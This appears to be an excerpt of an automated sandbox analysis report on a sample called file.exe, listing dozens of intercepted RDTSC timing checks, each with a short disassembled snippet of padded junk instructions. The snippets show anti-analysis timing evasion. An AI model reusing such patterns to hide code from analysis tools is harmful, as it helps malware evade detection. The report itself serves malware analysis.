Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A1850 second address: 5A18B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+124828B6h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 jmp 00007F40B477E792h 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d jmp 00007F40B477E78Ch 0x00000022 xchg eax, esi 0x00000023 push ebx 0x00000024 jo 00007F40B477E798h 0x0000002a jmp 00007F40B477E792h 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F40B477E78Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A2C08 second address: 5A2C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F40B515FBF6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A75B0 second address: 5A75B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ABF65 second address: 5ABF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B2011 second address: 5B2032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E794h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B2032 second address: 5B2057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F40B515FC06h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnl 00007F40B515FBF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550B55 second address: 550B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B4177 second address: 5B417C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B8A49 second address: 5B8A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B477E786h 0x0000000a jne 00007F40B477E786h 0x00000010 popad 0x00000011 jnc 00007F40B477E78Eh 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jns 00007F40B477E788h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9295 second address: 5B929C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9545 second address: 5B954F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F40B477E792h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B954F second address: 5B9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F40B515FBF6h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F40B515FBFDh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jc 00007F40B515FC14h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B96FD second address: 5B9707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9707 second address: 5B971D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F40B515FBF8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B99D5 second address: 5B99DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B4C second address: 5B9B77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F40B515FC07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F40B515FBF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B77 second address: 5B9B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B7B second address: 5B9B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B7F second address: 5B9B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F40B477E78Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9B97 second address: 5B9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F40B515FBF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9BA3 second address: 5B9BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BDECA second address: 5BDED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BDED2 second address: 5BDEE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F40B477E78Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE068 second address: 5BE06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE06E second address: 5BE07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F40B477E78Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE07A second address: 5BE0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F40B515FC01h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F40B515FBFBh 0x00000013 jbe 00007F40B515FBF6h 0x00000019 popad 0x0000001a jmp 00007F40B515FBFFh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE0B8 second address: 5BE0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F40B477E786h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE0CA second address: 5BE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE217 second address: 5BE223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BE987 second address: 5BE993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F40B515FBF6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9B6 second address: 56E9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9BB second address: 56E9CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9CD second address: 56E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9D3 second address: 56E9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56E9D7 second address: 56E9E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BF418 second address: 5BF438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jns 00007F40B515FBF6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F40B515FBFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3B7A second address: 5C3B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F40B477E795h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3CBD second address: 5C3CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3DFC second address: 5C3E10 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F40B477E786h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3E10 second address: 5C3E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3E14 second address: 5C3E1E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C42EB second address: 5C42F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3865 second address: 5C3869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3869 second address: 5C3875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C3875 second address: 5C387F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C387F second address: 5C3885 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C4AD4 second address: 5C4ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C4ADA second address: 5C4AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F40B515FC07h 0x0000000a jmp 00007F40B515FBFBh 0x0000000f jnl 00007F40B515FBF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FE23 second address: 58FE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E78Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FE32 second address: 56DF43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F40B515FBF8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+124567D7h], ebx 0x0000002b lea eax, dword ptr [ebp+12484B49h] 0x00000031 mov dword ptr [ebp+122D3709h], ebx 0x00000037 nop 0x00000038 ja 00007F40B515FC10h 0x0000003e push eax 0x0000003f jns 00007F40B515FC04h 0x00000045 nop 0x00000046 mov dword ptr [ebp+1244F1DBh], edi 0x0000004c call dword ptr [ebp+122D1F3Ah] 0x00000052 push eax 0x00000053 push ebx 0x00000054 jne 00007F40B515FBF6h 0x0000005a pop ebx 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FFD0 second address: 58FFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5904EF second address: 5904F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5904F3 second address: 5904F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59064B second address: 590651 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590651 second address: 590657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590657 second address: 59065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5907C3 second address: 5907C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590A43 second address: 590A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F40B515FBFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590A55 second address: 590A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591282 second address: 5912A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5912A4 second address: 5912C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E798h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5912C0 second address: 56E9B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, A2ACh 0x0000000f call dword ptr [ebp+122D1EF3h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnl 00007F40B515FBF6h 0x0000001e jmp 00007F40B515FC06h 0x00000023 jl 00007F40B515FBF6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9659 second address: 5C966B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C966B second address: 5C9680 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F40B515FBF6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007F40B515FBF6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9680 second address: 5C9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C990D second address: 5C9916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9916 second address: 5C991C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C991C second address: 5C9920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9A7C second address: 5C9A8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B477E786h 0x00000008 je 00007F40B477E786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C9A8C second address: 5C9A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D32EC second address: 5D330D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E799h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D330D second address: 5D3312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D3312 second address: 5D331E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545126 second address: 545132 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B515FBFEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2E19 second address: 5D2E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E796h 0x00000007 push edx 0x00000008 jno 00007F40B477E786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FC4 second address: 5D2FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FC9 second address: 5D2FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F40B477E786h 0x0000000a jns 00007F40B477E786h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FD9 second address: 5D2FF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D2FF5 second address: 5D3005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F40B477E786h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D5B59 second address: 5D5B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC17E second address: 5DC192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC192 second address: 5DC19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC19A second address: 5DC19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC19F second address: 5DC1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DC1A5 second address: 5DC1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DBB8F second address: 5DBBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push esi 0x00000007 jbe 00007F40B515FC13h 0x0000000d jmp 00007F40B515FC07h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E18D4 second address: 5E18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B477E790h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E18EA second address: 5E18FF instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B515FBFCh 0x00000008 jc 00007F40B515FBF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E18FF second address: 5E1908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E1908 second address: 5E190E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E07F6 second address: 5E0808 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F40B477E786h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0808 second address: 5E080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0962 second address: 5E0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E78Eh 0x00000009 jmp 00007F40B477E795h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590BF6 second address: 590BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
